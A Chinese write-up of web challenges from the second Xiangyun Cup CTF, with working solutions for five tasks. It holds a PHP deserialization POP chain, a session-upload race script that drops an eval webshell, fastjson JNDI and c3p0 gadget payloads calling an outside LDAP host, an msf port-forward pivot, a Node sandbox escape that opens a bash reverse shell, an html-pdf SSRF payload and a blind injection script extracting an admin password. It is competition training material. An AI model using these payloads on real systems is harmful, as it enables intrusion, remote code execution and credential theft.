【技术分享】第二届祥云杯 WEB WP

  • A+
所属分类:CTF专场

【技术分享】第二届祥云杯 WEB WP

 


ezyii


考察点:就是一个找pop,找到一半队友说有现成的。https://xz.aliyun.com/t/9948#toc-6 (之后删了)

<?phpnamespace CodeceptionExtension{    use FakerDefaultGenerator;    use GuzzleHttpPsr7AppendStream;    class  RunProcess{        protected $output;        private $processes = [];        public function __construct(){            $this->processes[]=new DefaultGenerator(new AppendStream());            $this->output=new DefaultGenerator('Firebasky');        }    }
echo base64_encode(serialize(new RunProcess()));}
namespace Faker{ class DefaultGenerator { protected $default;
public function __construct($default = null){ $this->default = $default; } }}namespace GuzzleHttpPsr7{ use FakerDefaultGenerator; final class AppendStream{ private $streams = []; private $seekable = true; public function __construct(){ $this->streams[]=new CachingStream(); } } final class CachingStream{ private $remoteStream; public function __construct(){ $this->remoteStream=new DefaultGenerator(false); $this->stream=new PumpStream(); } } final class PumpStream{ private $source; private $size=-10; private $buffer; public function __construct(){ $this->buffer=new DefaultGenerator('Firebasky'); include("closure/autoload.php"); $a = function(){system('cat /flag.txt');phpinfo(); }; $a = (OpisClosureserialize($a)); $b = (unserialize($a)); $this->source=$b; } }}

果然一打就欧克。。。

【技术分享】第二届祥云杯 WEB WP

 


安全检测


考察点:文件包含session条件竞争

猜一猜是ssrf,先读一下本地

【技术分享】第二届祥云杯 WEB WP

成功显示了本地页面

【技术分享】第二届祥云杯 WEB WP

参数admin页面。然后访问。。。访问不到说明需要刚刚的方法访问

【技术分享】第二届祥云杯 WEB WP

成功获得源代码

【技术分享】第二届祥云杯 WEB WP

哎文件包含,一看就是session条件竞争哎,都考烂了。而且过滤一点迷迷糊糊。file_put_contents不是file_put_content。

只不过这里一直跑条件竞争,手工访问并且添加包含文件也就是我们正在条件竞争的文件。然后在tmp写写入php文件进行包含

import ioimport requestsimport threading
def Write(session): while True: f = io.BytesIO(b'a' * 1024 * 512) session.post(url='url', data={'PHP_SESSION_UPLOAD_PROGRESS': '111111111111111111111111111111111111111111111111111111111<?php phpinfo();file_put_contents("/tmp/1","<?php eval(base64_decode($_GET[1]));phpinfo();?>");?>'}, files={'file': ('Firebasky.txt',f)}, cookies={'PHPSESSID': 'Firebasky'})
if __name__=="__main__": event = threading.Event() with requests.session() as session: for i in range(1,50): threading.Thread(target=Write,args=(session,)).start()
system("/getflag.sh");
http://127.0.0.1/admin/include123.php?u=/tmp/1&1=c3lzdGVtKCIvZ2V0ZmxhZy5zaCIpOw==

【技术分享】第二届祥云杯 WEB WP

 


层层穿透


考察点:Apache Flink RCE 加 内网fastjson绕过

https://blog.csdn.net/weixin_45492773/article/details/105975768

我们先获得shell。分析代码我们发现是fastjson而且是内网环境。而且加了一些过滤

【技术分享】第二届祥云杯 WEB WP

上午找到一个链子:本地打通了,环境有问题然后。。。打了一下午,然后以为不出网。重新找。

内网环境:https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_fastjson_demo

{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"}

【技术分享】第二届祥云杯 WEB WP

然后找到这个。使用我们可以使用其他链进行绕过。查看lib里面存在c3p0

【技术分享】第二届祥云杯 WEB WP

然后直接上exp。百度就欧克。https://github.com/depycode/fastjson-c3p0

【技术分享】第二届祥云杯 WEB WP

在打之前需要登录,因为有shiro验证。

POST /doLogin admin/123456 就欧克。

/admin/test
cmd: cat /flagContent-Type: application/json
{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870707400136765744F757470757450726F7065727469657370737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017371007E000B3F4000000000000C770800000010000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00084C00055F6E616D6571007E00074C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000DCFCAFEBABE0000003400CD0A0014005F090033006009003300610700620A0004005F09003300630A006400650A003300660A000400670A000400680A0033006907006A0A0014006B0A0012006C08006D0B000C006E08006F0700700A001200710700720A007300740700750700760700770800780A0079007A0A0018007B08007C0A0018007D08007E08007F0800800B001600810700820A008300840A008300850A008600870A002200880800890A0022008A0A0022008B0A008C008D0A008C008E0A0012008F0A009000910A009000920A001200930A003300940700950A00120096070097010001680100134C6A6176612F7574696C2F486173685365743B0100095369676E61747572650100274C6A6176612F7574696C2F486173685365743C4C6A6176612F6C616E672F4F626A6563743B3E3B010001720100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010001700100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100204C79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F313B01000169010015284C6A6176612F6C616E672F4F626A6563743B295A0100036F626A0100124C6A6176612F6C616E672F4F626A6563743B01000D537461636B4D61705461626C65010016284C6A6176612F6C616E672F4F626A6563743B492956010001650100154C6A6176612F6C616E672F457863657074696F6E3B010008636F6D6D616E64730100135B4C6A6176612F6C616E672F537472696E673B0100016F01000564657074680100014907007607004C070072010001460100017101000D6465636C617265644669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000573746172740100016E0100114C6A6176612F6C616E672F436C6173733B07007007009807009901000A536F7572636546696C65010010436F6D6D6F6E4563686F312E6A6176610C003C003D0C003800390C003A003B0100116A6176612F7574696C2F486173685365740C0034003507009A0C009B009C0C005300480C009D00440C009E00440C004300440100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740C009F00A00C00A100A2010003636D640C00A300A401000B676574526573706F6E736501000F6A6176612F6C616E672F436C6173730C00A500A60100106A6176612F6C616E672F4F626A6563740700A70C00A800A90100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F6C616E672F457863657074696F6E0100106A6176612F6C616E672F537472696E670100076F732E6E616D650700AA0C00AB00A40C00AC00AD01000357494E0C009D00AE0100022F630100072F62696E2F73680100022D630C00AF00B00100116A6176612F7574696C2F5363616E6E65720700B10C00B200B30C00B400B50700B60C00B700B80C003C00B90100025C410C00BA00BB0C00BC00AD0700BD0C00BE00BF0C00C0003D0C00C100C20700990C00C300C40C00C500C60C00C700C80C003A00480100135B4C6A6176612F6C616E672F4F626A6563743B0C00C900A001001E79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F3101001A5B4C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C640100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010008636F6E7461696E73010003616464010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B010010697341737369676E61626C6546726F6D010014284C6A6176612F6C616E672F436C6173733B295A010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F55707065724361736501001428294C6A6176612F6C616E672F537472696E673B01001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100046E6578740100136A6176612F696F2F5072696E745772697465720100077072696E746C6E010015284C6A6176612F6C616E672F537472696E673B2956010005666C7573680100116765744465636C617265644669656C647301001C28295B4C6A6176612F6C616E672F7265666C6563742F4669656C643B01000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100076973417272617901000328295A01000D6765745375706572636C617373010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700CA0A00CB005F0021003300CB000000030008003400350001003600000002003700080038003900000008003A003B000000040001003C003D0001003E0000005C000200010000001E2AB700CC01B3000201B30003BB000459B70005B30006B8000703B80008B100000002003F0000001A0006000000140004001500080016000C001700160018001D001900400000000C00010000001E004100420000000A004300440001003E0000005A000200010000001A2AC6000DB200062AB6000999000504ACB200062AB6000A5703AC00000003003F0000001200040000001D000E001E001000210018002200400000000C00010000001A00450046000000470000000400020E01000A003A00480001003E000001D300050003000000EF1B1034A3000FB20002C6000AB20003C60004B12AB8000B9A00D7B20002C70051120C2AB6000DB6000E9900452AC0000CB30002B20002120FB900100200C7000A01B30002A7002AB20002B6000D121103BD0012B60013B2000203BD0014B60015C00016B30003A700084D01B30002B20002C60076B20003C6007006BD00184D1219B8001AB6001B121CB6001D9900102C03120F532C04121E53A7000D2C03121F532C041220532C05B20002120FB90010020053B20003B900210100BB002259B800232CB60024B60025B700261227B60028B60029B6002AB20003B900210100B6002BA700044DB12A1B0460B80008B100020047006600690017007A00E200E500170003003F0000006A001A000000250012002600130028001A0029002C002A0033002B0040002C0047002F0066003300690031006A0032006E0037007A003A007F003B008F003C0094003D009C003F00A1004000A6004200B3004400D7004500E2004700E5004600E6004800E7004B00EE004D00400000002A0004006A00040049004A0002007F0063004B004C0002000000EF004D00460000000000EF004E004F0001004700000022000B1200336107005004FC002D07005109FF003E0002070052010001070050000006000A005300480001003E000001580002000C000000842AB6000D4D2CB6002C4E2DBE360403360515051504A200652D1505323A06190604B6002D013A0719062AB6002E3A071907B6000DB6002F9A000C19071BB80030A7002F1907C00031C000313A081908BE360903360A150A1509A200161908150A323A0B190B1BB80030840A01A7FFE9A700053A08840501A7FF9A2CB60032594DC7FF85B100010027006F007200170003003F0000004200100000005000050052001E00530024005400270056002F0058003A00590043005B0063005C0069005B006F00620072006100740052007A0065007B00660083006800400000003E00060063000600540046000B0027004D004D00460007001E00560055005600060000008400570046000000000084004E004F00010005007F00580059000200470000002E0008FC000507005AFE000B07005B0101FD003107005C070052FE00110700310101F8001942070050F90001F800050001005D00000002005E707400016170770100787400017878737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000000787871007E000D78;"},"a":"xxx........"}

然后我们添加恶意key和value去绕过

【技术分享】第二届祥云杯 WEB WP

然后我们将内网的ip端口代理出来就欧克,简单的测试一下发现IP是10.10.1.11而且因为环境是springboot默认端口是8080直接代理出来就欧克。

【技术分享】第二届祥云杯 WEB WP

使用msf代理。

portfwd add -l 8080 -p 8080 -r 10.10.1.11

【技术分享】第二届祥云杯 WEB WP

这里我想吐槽一下环境,exp本地上午就调试好了,打了一下午环境都没有出。。环境是真的不行。。。。。。。。。

 


crawler_z


考察:zombie模块注入漏洞

https://ha.cker.in/index.php/Article/13563

功能大概就是爬虫功能,主要是绕过爬虫的url,exp文章中有写了。

漏洞点在goto里面的visit

【技术分享】第二届祥云杯 WEB WP

然后功能就是我们传入bucket然后就是生成token去判断去请求爬虫。主要是我们在这个过程中替换我们的url就欧克。

【技术分享】第二届祥云杯 WEB WP

需要注意我们传入的bucket是通过checkBucket函数验证然后给了personalBucket

最后通过/verify传递通过personalBucket更新,也就是说我们可以覆盖之前的url,但是token还是一样的。

【技术分享】第二届祥云杯 WEB WP

先生成token

【技术分享】第二届祥云杯 WEB WP

然后替换bucket为我们的url里面的exp。

【技术分享】第二届祥云杯 WEB WP

之后成功更新

【技术分享】第二届祥云杯 WEB WP

之后访问/user/bucket,成功反弹。

【技术分享】第二届祥云杯 WEB WP

exp.html
<script>c='constructor';this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('bash', ['-c','bash -i >& /dev/tcp/ip/port 0>&1'],); console.log(ls.output.toString());")()</script>



Secrets_Of_Admin


登录通过sql数据库里面获得

admin/e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645

然后输入我们的content拼接进入template模板里面,生成pdf。然后放进数据库

【技术分享】第二届祥云杯 WEB WP

这里通过数组绕过。然后/api/files路由又会创建我们的控制传输。进行存放数据库。

【技术分享】第二届祥云杯 WEB WP

在/api/files/:id页面里面读取我们存放的文件内容

https://github.com/marcbachmann/node-html-pdf/issues/530

https://www.npmjs.com/advisories/1095 测试http协议

但是我们可以通过src标签进行绕过,去访问http://127.0.0.1:8888/api/files 让他去创建一个admin的用户文件是flag,checksun为我们控制的,就成功。文件名字我们可以通过目录超越去操作。这里进行拼接。

【技术分享】第二届祥云杯 WEB WP

exp

content[]=<img%20src="http://127.0.0.1:8888/api/files?username=admin%26filename=/../files/flag%26checksum=5201314">

然后访问/api/files/5201314就可以下载flag

【技术分享】第二届祥云杯 WEB WP

 


PackageManager2021


考察:sql注入

大概功能就是注册用户登录,之后自己可以添加包,通过注入去获得token然后提交我们的包,让bot去访问返回cookie。然后登录admin去获得flag包。

【技术分享】第二届祥云杯 WEB WP

本地测试xss可以打通,不知道题目打不通。之后在/packages/submit页面可以进行注入

【技术分享】第二届祥云杯 WEB WP

cf87efe0c36a12aec113cd7982043573 “||this.username==”admin 。绕过token。

xss没有打通然后就通过注入去获得admin密码。

# -*- coding: utf-8 -*# /usr/bin/python3# @Author:Firebaskyimport requestspasswd = ""for i in range(0,50):    for j in range(32,127):        burp0_url = "http://47.104.108.80:8888/auth"        burp0_cookies = {"session": "s%3A48cl_lUReimQytHn7toEfeafbGGIpWXB.YBzs%2B3EcrGrFNvfOoe0wEbmm2NSA%2B4tVAlsYy7eRoIE"}        burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://47.104.108.80:8888", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://47.104.108.80:8888/auth", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}        burp0_data = {"_csrf": "kATaxQjv-Uka6Hw6X85iWgBuhyTxqgy7pvVA", "token": "cf87efe0c36a12aec113cd7982043573"||(this.username=="admin"&&this.password[{}]=="{}")||"".format(i,chr(j))}        res=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,allow_redirects=False)        if res.status_code == 302:            passwd += chr(j)            print(passwd)

【技术分享】第二届祥云杯 WEB WP

然后直接登录就ok。

【技术分享】第二届祥云杯 WEB WP



总结


题目不错慢慢的偏java和nodejs方向了,其他的懂的都懂。。。。

【技术分享】第二届祥云杯 WEB WP【技术分享】第二届祥云杯 WEB WP


- 结尾 -
精彩推荐
【技术分享】Electron的openExternal可控利用点分析
CEO为创业资金,竟招募黑客干起了勒索交易?
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞
【技术分享】spring-boot-thymeleaf-ssti
【技术分享】第二届祥云杯 WEB WP
戳“阅读原文”查看更多内容

本文始发于微信公众号(安全客):【技术分享】第二届祥云杯 WEB WP

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: